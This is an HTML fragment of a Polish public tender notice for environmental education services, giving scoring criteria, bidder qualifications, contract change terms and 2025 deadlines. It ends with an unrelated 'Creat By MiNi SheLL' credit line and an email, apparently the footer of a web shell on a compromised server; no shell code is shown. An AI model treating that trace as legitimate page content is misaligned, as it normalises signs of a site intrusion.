<br/><br/>CENA<br/>Cena będzie oceniana metodą punktową wg wzoru: <br/>Cena najniższa ze wszystkich ofert × 100 pkt × Znaczenie kryterium 60%/<br/>Cena oferty badanej<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/><br/>DOŚWIADCZENIE OSOBY UCZESTNICZĄCEJ W PRZEPROWADZENIU DZIAŁAŃ EDUKACYJNYCH<br/>Kryterium &#34;Doświadczenie osoby uczestniczącej w przeprowadzeniu działań edukacyjnych” będzie rozpatrywane na podstawie wykazanego w formularzu ofertowym doświadczenia zawodowego wskazanej osoby do realizacji zamówienia w zakresie udziału w wykonanych zadaniach polegających na przeprowadzeniu działań edukacyjnych o wartości minimum 30 000,00 zł brutto z zakresu ochrony powietrza lub ochrony środowiska. Zamawiający przyzna następujące punkty:<br/>-	udział w przeprowadzeniu działań edukacyjnych o wartości minimum <br/>30 000,00 zł brutto – 1 zadanie – 10 pkt,<br/>-	udział w przeprowadzeniu działań edukacyjnych o wartości minimum <br/>30 000,00 zł brutto każde z zadań – 2 zadania – 20 pkt.<br/>-	udział w przeprowadzeniu działań edukacyjnych o wartości minimum <br/>30 000,00 zł brutto każde z zadań – 3 zadania – 30 pkt,<br/>-	udział w przeprowadzeniu działań edukacyjnych o wartości minimum <br/>30 000,00 zł brutto każde z zadań – 4 zadania i więcej – 40 pkt.<br/><br/>Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów (S) stanowiących sumę punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej danego kryterium, obliczonych wg wzoru:<br/>S= C+D<br/>gdzie:<br/>S – łączna ocena punktowa<br/>C – liczba uzyskanych punktów w kryterium cena<br/>D – liczba uzyskanych punktów w kryterium doświadczenie osoby uczestniczącej w przeprowadzeniu działań edukacyjnych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby uczestniczącej w przeprowadzeniu działań edukacyjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym;<br/><br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/><br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/> <br/>3) sytuacji ekonomicznej lub finansowej;<br/><br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/><br/>4) zdolności technicznej lub zawodowej:<br/><br/>a) doświadczenie wykonawcy:<br/>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej trzy zamówienia, które polegały na przeprowadzeniu działań edukacyjnych w zakresie ochrony powietrza lub ochrony środowiska o wartości co najmniej 35.000,00 zł brutto każda. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (wg zał. nr 4 do SWZ);</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykaz usług wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, rzecz których usługi zostały wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane – zgodnie ze wzorem załącznika nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty składane razem z ofertą:<br/>1.1.	formularz ofertowy (wg zał. nr 1 do SWZ),<br/>1.2.	oświadczenie wykonawcy/wykonawców wspólnie ubiegających się o udzielenie zamówienia dotyczące przesłanek wykluczenia z postępowania oraz spełniania warunków udziału w postępowaniu w zakresie wskazanym w SWZ (wg załącznika nr 2a do SWZ),<br/><br/>Wykonawca załącza do oferty również (jeżeli dotyczy):<br/><br/>1.3.	oświadczenie podmiotu udostępniającego zasoby dotyczące przesłanek wykluczenia z postępowania oraz spełniania warunków udziału <br/>w postępowaniu w zakresie wskazanym w SWZ, w jakim podmiot udostępnia swoje zasoby wykonawcy (wg załącznika nr 2b do SWZ),<br/>1.4. samooczyszczenie – w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 lub art. 109 ust. 1 pkt 4 i 7 ustawy Pzp, <br/>1.5. pełnomocnictwo,<br/>1.6. oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (wg zał. nr 6 do SWZ),<br/>1.7. zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia w przypadku gdy Wykonawca, w celu spełnienia warunków, o którym mowa w Rozdziale II pkt 7 ppkt 4 SWZ, będzie polegał na zdolnościach technicznych lub zawodowych innych podmiotów (wg zał. nr 5 do SWZ),<br/>1.8. zastrzeżenie tajemnicy przedsiębiorstwa.<br/><br/>Zakres i forma składania ww. dokumentów zostały określone w SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia.<br/>W takim przypadku:<br/>- ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,<br/>- zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego, przyjmuje się, że pełnomocnictwo do<br/>podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów,<br/>pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną; fakt ustanowienia<br/>pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie przez<br/>Zamawiającego wyłącznie z pełnomocnikiem.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący<br/>uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni wykonawcy.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy<br/>wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są<br/>zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.<br/>5. Wymagania dotyczące wykonawców ubiegających się wspólnie o udzielenie zamówienia zostały opisane w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje, zgodnie z art. 455 i art. 439 ust. 1 ustawy Prawo zamówień publicznych, możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści Oferty, na podstawie której dokonano wyboru Wykonawcy. Przypadki i warunki takich zmian to:<br/>1)	zmiana stawki podatku VAT dla usług objętych przedmiotem zamówienia w trakcie realizacji przedmiotu zamówienia, w takim przypadku strony dokonają odpowiedniej zmiany wynagrodzenia brutto - dotyczy to części wynagrodzenia za usługi, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano. Zamawiający dopuszcza możliwość zwiększenia lub zmniejszenia wynagrodzenia należnego Wykonawcy o kwotę stanowiącą różnicę między nowo obowiązującą a dotychczasową wysokością podatku od towarów i usług, jednakże wyłącznie za okres po wejściu w życie zmiany jego wysokości, <br/>2)	zmiany wysokości wynagrodzenia w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę, jeżeli zmiany te będą miały wpływ na koszt wykonania zamówienia przez wykonawcę,<br/>3)	zmiany wysokości wynagrodzenia w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>4)	zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych.<br/>5)	zmiany wynagrodzenia, o którym mowa w § 6 ust. 6-8,<br/>6)	zmiana terminu realizacji przedmiotu umowy w przypadku:<br/>a) wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia,<br/>b) wstrzymania przez Zamawiającego wykonania usług, które nie wynika z okoliczności leżących po stronie Wykonawcy,<br/>c) okoliczności zaistniałych w trakcie realizacji przedmiotu umowy, za które Wykonawca ponosi odpowiedzialność,<br/>2.	Zmiany i uzupełnienia umowy wymagają formy pisemnej pod rygorem nieważności i muszą być zaakceptowane przez obie strony umowy i mogą być dokonywane tylko przed upływem terminu realizacji niniejszej umowy na pisemny wniosek Wykonawcy lub Zamawiającego, złożony bez zbędnej zwłoki. Wniosek winien zawierać szczegółowe uzasadnienie.<br/>3.	Wykonawca ubiegający się o zmianę wynagrodzenia powinien udowodnić w sposób ścisły i precyzyjny zasady wzrostu cen, towarów, usług. Wniosek powinien zawierać dokładne wyliczenie podstaw zmiany oraz kalkulację w zakresie zmian.<br/>4.	Zamawiający ma prawo pozostawić bez rozpoznania wniosek niespełniający tych warunków lub zawierający dane nieprecyzyjne, nielogiczne i nieudowodnione.<br/>5. W trakcie trwania umowy Wykonawca jest zobowiązany do pisemnego informowania Zamawiającego o:<br/>1)	zmianie siedziby lub nazwy firmy,<br/>2)	zmianie osób reprezentujących,<br/>3)	złożeniu wobec Wykonawcy wniosku o ogłoszenie upadłości obejmującej likwidację majątku Wykonawcy,<br/>4)	ogłoszeniu likwidacji,<br/>5)	zawieszeniu działalności gospodarczej,<br/>6)	wszczęciu postępowania naprawczego, dotyczącego Wykonawcy. <br/><br/><br/>Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały szczegółowo opisane we wzorze umowy stanowiącym załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-03 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa: https://dlugosiodlo.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-03 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com